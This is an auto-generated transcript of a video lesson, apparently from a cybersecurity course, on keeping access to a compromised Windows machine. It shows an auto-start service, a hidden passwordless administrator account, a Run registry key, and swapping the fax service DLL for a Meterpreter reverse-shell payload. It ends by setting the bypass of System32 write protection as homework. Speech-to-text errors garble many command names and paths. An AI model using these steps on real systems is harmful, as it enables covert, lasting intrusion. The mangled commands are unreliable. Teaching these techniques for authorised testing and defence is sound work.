What is Persistence?

Download

Hey, everybody, welcome to the next video, we're going to be looking at Windows persistance.

So in the next video after this, we'll be talking about Linux persistance button.

This one is going to be Windows.

And I'm going to talk to you about four different types of our four different ways we can perform persistance on a Windows machine just right off the top.

Now, the first one is creating a service.

Now, we've created a service before.

In previous videos, we were going over the Windows OS, but this is going to be a quick recap for everybody.

So if we go ahead and access our show, we'll do a C create and we'll do a secret as the name of the service been path equals with a space at the end.

Always remember that C Slash will call this a secret C and will do start is equal to auto, which is the important part here.

So it starts up on start.

There we go.

So if we go ahead and take a look at the service see queering secret, we can see that it isn't currently not running, which is exactly what we'd expect and see QIC secret.

We can see that we have our window process, its auto.

It's the path the secret display name is secret, but the service start name is local system, which means it's going to start up as local system, which is exactly what we want.

Go ahead and delete that so we don't have to running and causing errors.

But as you can see, we this is the first step in making persistance.

We've got a service that runs on startup and then we'll always be good to go.

The next is just like how we're going to show you in the Linux persistance.

Tomorrow, we're going to create a user.

So to create a user on Windows, its net user and then the name.

So we'll call this team Red No red team, then slash ad that will go ahead and add the user for us and then we can do not user red team star that will allow us to reset the password.

However, because of the type of prompt that we have, it's going to just fail.

It's going to just basically put empty text in the the field and enter it and that's going to show it, having typed the password and typed it again and then command successfully executed.

Now when you run this on the local system, you will have a different you'll have a different result.

But right now we have a user with a with no password, which is fine on some systems and not fine and others, depending on the group policies that are put into effect.

Because if there is a policy where you have to have a password to RTP, to a machine as an example, then you couldn't use this to already to a machine, you would have to find a different way to reset the password.

So I'll go ahead and leave that to you guys to go ahead and find a different way to reset a user's password through the command line without having to use this particular way.

Now, the last step is we're going to want to add the user to a the administrative group.

So that's not a local group or local group administrators.

And then the user name at.

That's it.

Now we've got it, now we've got a user account created called Red Team with no password, and it is also part of the local administrators group, which means we are OK and good to go.

Now, the last part I want to show you guys, Cecily's OK.

It doesn't work there, but there's one number three now and so on.

This one, I want to show you guys how to set up a registry key tool that allows Windows to, when it starts up, to use that particular registry key to start an application.

So if you're if you're already managing Windows Systems, you'll find this registry key pretty straightforward.

It's the current version run.

So which is where everything for that user, for that system goes ahead and logs in or starts the system, it'll go ahead and run through this registry or any registry key in this setting and go ahead and launch it.

So the first thing we do is do Regg add and then HQ for the current users registry hive software Microsoft.

When no current version run, this is a fairly common path, and most things that run on start up for a current user is going to end up in a registry key here.

So if we do, we we give it a name, we'll say secret as well.

Oh.

Secret and the type in this particular case, it's a dash AC slash effort to force any anything else that's labeled secret.

We'll just overwrite it and slash D.

So the path that we're going to want to use will use slash secret.

So we've gone ahead and added that, so I'm going to show you guys real quickly what this looks like from a registry viewpoint.

There you go.

So you can see here we've got current user software, Microsoft Windows current version and run, run.

So go ahead and refresh.

OK, so we can see the reason why we don't see the key, but it was created is if we get the UID were empty system authority, so we're the system user.

So right now, this is currently the administrative user.

So what we'll do is we'll go ahead and kill this interpreter session.

We'll rerun it and we'll go ahead and launch our exploit one more time as the system user.

And you can see here, we got it.

So for you, Shell, now our system, instead of our worst administrator instead of system, we copy this same command.

It's not what we're looking for.

Copy paste.

Go and run that again.

And if we come back in here again under that same one, but now is the correct user and we hit refresh, but we now see our register.

Make sure you keep that in mind.

Now, if you have it running a system, it's a little bit flaky when you do that.

But you might want to you when you're working with this type of register key where you're doing a start up, you're going to want it to be under a specific user rather than this rather than the system user.

Now, you could do this and have it go against the instead of the current user.

You can go against the current machine.

And that works just as fine.

We're going to close this.

Perfect.

Now, the last step I want to talk to you guys about is DLO preloading.

So what this is, is this is allows you to create a binary or a deal with the same name as another one that's already on the system and you overwrite that binary on the system with your current one.

Now, this can be a this is normally considered a dirty based persistance because it's very obvious in some cases to the user or the admin, because now all of a sudden the binary is not doing what it's ex-post it's supposed to do when it's loaded.

So a quick way for us to go ahead and do that as well.

Create a binary will do.

Here it is.

We're going to do and this FNM, we're going to open up a 64 bit interpretor, reverse TCP with the correct parameters and we're going to use a dash F for DLO and then we're going to call this effect

Astudillo.

So we'll go ahead and create that.

Now Ezzati T is used for the fax service on the Windows machine, so it's less likely to be noticed if there's an error with the fax service because there's not really as much use for the fax service as there are for like logging in or using the Internet or anything else like that.

It's so less obvious to the current user and admins, less likely to bother looking at a system if it's having some startup failure for a fax service.

Now, if we go ahead and look here, we have our ethics, says Tedlow and in our interpreter show, we're not in our show anymore.

We're interpretor show.

If we go ahead and do l l e l.

So that's the local.

So you can see this is our local machine.

But if we do well, we can see that this is now our external machine are the one we're actually compromised.

So and you can do local change directory so we'll newsgroups.

You just put an L in front of whatever you want when you're referring to a locally.

So what we're going to want to do is run upload effects, Astudillo upload effects.

That's just teed up DLO.

It'll upload to whatever the current directory is.

So we do l we can see we now have it moved in here correctly.

Let's go ahead and go show and we'll do the IRS to make sure it's there and it is.

So what you would normally do is copy.

Effects assessed heat abdelal, and we would copy that over into Windows System 32, and that's it, then you would say yes, you want to overwrite anything there.

However, you're going to get an access denied.

So what I want you guys to do is take a little bit of time and research to identify why.

Keep in mind, this is a Windows seven machine, not on Windows XP.

Why is it not allowing you to overwrite this file?

And then what are some ways for you to override the file?

I want you guys to take that little bit of extra time and do the research around it and go back to the Facebook group and let us know how you guys decided to go about it.

Complete and Continue  

Become a Member and Get Unlimited Access to 340+ Top Cyber Security Courses.